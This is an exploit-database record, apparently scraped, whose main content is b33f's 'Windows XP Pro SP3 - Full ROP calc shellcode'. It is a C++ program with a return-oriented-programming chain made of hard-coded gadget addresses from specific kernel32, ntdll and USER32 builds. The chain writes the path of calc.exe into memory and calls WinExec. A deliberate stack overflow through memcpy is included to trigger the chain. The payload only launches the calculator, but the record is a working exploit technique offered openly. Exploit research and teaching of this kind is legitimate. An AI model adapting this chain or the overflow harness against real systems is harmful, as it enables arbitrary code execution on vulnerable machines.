{"bulletinFamily": "exploit", "id": "EDB-ID:22489", "cvelist": [], "modified": "2012-11-05T00:00:00", "lastseen": "2016-02-02T18:51:47", "edition": 1, "sourceData": "/*\r\n Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode\r\n Author: b33f (http://www.fuzzysecurity.com/)\r\n Notes: This is probably not the most efficient way but\r\n I gave the dll's a run for their money ;))\r\n Greets: Donato, Jahmel\r\n\r\n OS-DLL's used:\r\n Base | Top | Size | Version (Important!)\r\n ___________|____________|____________|_____________________________\r\n 0x7c800000 | 0x7c8f6000 | 0x000f6000 | 5.1.2600.5781 [kernel32.dll]\r\n 0x7c900000 | 0x7c9b2000 | 0x000b2000 | 5.1.2600.6055 [ntdll.dll]\r\n 0x7e410000 | 0x7e4a1000 | 0x00091000 | 5.1.2600.5512 [USER32.dll]\r\n\r\n UINT WINAPI WinExec( => PTR to WinExec\r\n __in LPCSTR lpCmdLine, => C:\\WINDOWS\\system32\\calc.exe+00000000\r\n __in UINT uCmdShow => 0x1\r\n );\r\n*/\r\n\r\n#include <iostream>\r\n#include \"windows.h\"\r\n\r\nchar shellcode[]=\r\n\"\\xb1\\x4f\\x97\\x7c\" // POP ECX # RETN\r\n\"\\xf9\\x10\\x47\\x7e\" // Writable PTR USER32.dll\r\n\"\\x27\\xfa\\x87\\x7c\" // POP EDX # POP EAX # RETN\r\n\"\\x43\\x3a\\x5c\\x57\" // ASCII \"C:\\W\"\r\n\"\\x49\\x4e\\x44\\x4f\" // ASCII \"INDO\"\r\n\"\\x04\\x18\\x80\\x7c\" // MOV DWORD PTR DS:[ECX],EDX # MOV DWORD PTR DS:[ECX+4],EAX # POP EBP # RETN 04\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\xe5\\x02\\x88\\x7c\" // POP EAX # RETN\r\n\"\\x57\\x53\\x5c\\x73\" // ASCII \"WS\\s\"\r\n\"\\x38\\xd6\\x46\\x7e\" // MOV DWORD PTR DS:[ECX+8],EAX # POP ESI # POP EBP # RETN 08\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\xe5\\x02\\x88\\x7c\" // POP EAX # RETN\r\n\"\\x79\\x73\\x74\\x65\" // ASCII \"yste\"\r\n\"\\xcb\\xbe\\x45\\x7e\" // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\xe5\\x02\\x88\\x7c\" // POP EAX # RETN\r\n\"\\x63\\x61\\x6c\\x63\" // ASCII \"calc\"\r\n\"\\x31\\xa9\\x91\\x7c\" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x07\\x3d\\x96\\x7c\" // INC ECX # RETN\r\n\"\\x07\\x3d\\x96\\x7c\" // INC ECX # RETN\r\n\"\\x07\\x3d\\x96\\x7c\" // INC ECX # RETN\r\n\"\\x07\\x3d\\x96\\x7c\" // INC ECX # RETN\r\n\"\\xe5\\x02\\x88\\x7c\" // POP EAX # RETN\r\n\"\\x6d\\x33\\x32\\x5c\" // ASCII \"m32\\\"\r\n\"\\xcb\\xbe\\x45\\x7e\" // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\xe5\\x02\\x88\\x7c\" // POP EAX # RETN\r\n\"\\x2e\\x65\\x78\\x65\" // ASCII \".exe\"\r\n\"\\x31\\xa9\\x91\\x7c\" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x07\\x3d\\x96\\x7c\" // INC ECX # RETN\r\n\"\\x07\\x3d\\x96\\x7c\" // INC ECX # RETN\r\n\"\\x07\\x3d\\x96\\x7c\" // INC ECX # RETN\r\n\"\\x07\\x3d\\x96\\x7c\" // INC ECX # RETN\r\n\"\\x9e\\x2e\\x92\\x7c\" // XOR EAX,EAX # RETN\r\n\"\\x31\\xa9\\x91\\x7c\" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\xee\\x4c\\x97\\x7c\" // DEC ECX # RETN\r\n\"\\xee\\x4c\\x97\\x7c\" // DEC ECX # RETN\r\n\"\\xee\\x4c\\x97\\x7c\" // DEC ECX # RETN\r\n\"\\xee\\x4c\\x97\\x7c\" // DEC ECX # RETN\r\n\"\\xee\\x4c\\x97\\x7c\" // DEC ECX # RETN\r\n\"\\xee\\x4c\\x97\\x7c\" // DEC ECX # RETN\r\n\"\\xee\\x4c\\x97\\x7c\" // DEC ECX # RETN\r\n\"\\xee\\x4c\\x97\\x7c\" // DEC ECX # RETN\r\n//-------------------------------------------[\"C:\\WINDOWS\\system32\\calc.exe+00000000\" -> ecx]-//\r\n\"\\xe5\\x02\\x88\\x7c\" // POP EAX # RETN\r\n\"\\x7a\\xeb\\xc3\\x6f\" // Should result in a valid PTR in kernel32.dll\r\n\"\\x4f\\xda\\x85\\x7c\" // PUSH ESP # ADC BYTE PTR DS:[EAX+CC4837C],AL # XOR EAX,EAX # INC EAX # POP EDI # POP EBP # RETN 08\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x32\\xd9\\x44\\x7e\" // XCHG EAX,EDI # RETN\r\n\"\\x62\\x28\\x97\\x7c\" // ADD EAX,20 # POP EBP # RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x62\\x28\\x97\\x7c\" // ADD EAX,20 # POP EBP # RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x62\\x28\\x97\\x7c\" // ADD EAX,20 # POP EBP # RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x62\\x28\\x97\\x7c\" // ADD EAX,20 # POP EBP # RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n//-----------------------------------------------------------[Save Stack Pointer + pivot eax]-//\r\n\"\\xd6\\xd1\\x95\\x7c\" // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x33\\x80\\x97\\x7c\" // INC EAX # RETN\r\n\"\\x33\\x80\\x97\\x7c\" // INC EAX # RETN\r\n\"\\x33\\x80\\x97\\x7c\" // INC EAX # RETN\r\n\"\\x33\\x80\\x97\\x7c\" // INC EAX # RETN\r\n\"\\xf5\\xd6\\x91\\x7c\" // XOR ECX,ECX # RETN\r\n\"\\x07\\x3d\\x96\\x7c\" // INC ECX # RETN\r\n\"\\xd6\\xd1\\x95\\x7c\" // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\xb1\\x4f\\x97\\x7c\" // POP ECX # RETN\r\n\"\\xed\\x2a\\x86\\x7c\" // WinExec()\r\n\"\\xe7\\xc1\\x87\\x7c\" // MOV DWORD PTR DS:[EAX+4],ECX # XOR EAX,EAX # POP EBP # RETN 04\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate POP\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Compensate RETN\r\n\"\\x8a\\x20\\x87\\x7c\" // Final RETN for WinExec()\r\n\"\\x8a\\x20\\x87\\x7c\"; // Compensate WinExec()\r\n//------------------------------------------------------[Write Arguments and execute -> calc]-//\r\n\r\nvoid buff() {\r\n\tchar a;\r\n\tmemcpy((&a)+5, shellcode, sizeof(shellcode)); // Compiler dependent, works with Dev-C++ 4.9\r\n}\r\n\r\nint main()\r\n{\r\n LoadLibrary(\"USER32.dll\"); // we need this dll\r\n\tchar buf[1024];\r\n\tbuff();\r\n\treturn 0;\r\n}\r\n", "published": "2012-11-05T00:00:00", "href": "https://www.exploit-db.com/exploits/22489/", "osvdbidlist": [], "reporter": "b33f", "hash": "304344b46406a1c49f292e2dd3f2c66f16806b3c405035fe7b66f601eae0f8df", "title": "Windows XP Pro SP3 - Full ROP calc shellcode", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Windows XP Pro SP3 - Full ROP calc shellcode. Shellcode exploit for windows platform", "references": [], "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/22489/", "enchantments": {"vulnersScore": 4.6}}

{"result": {}}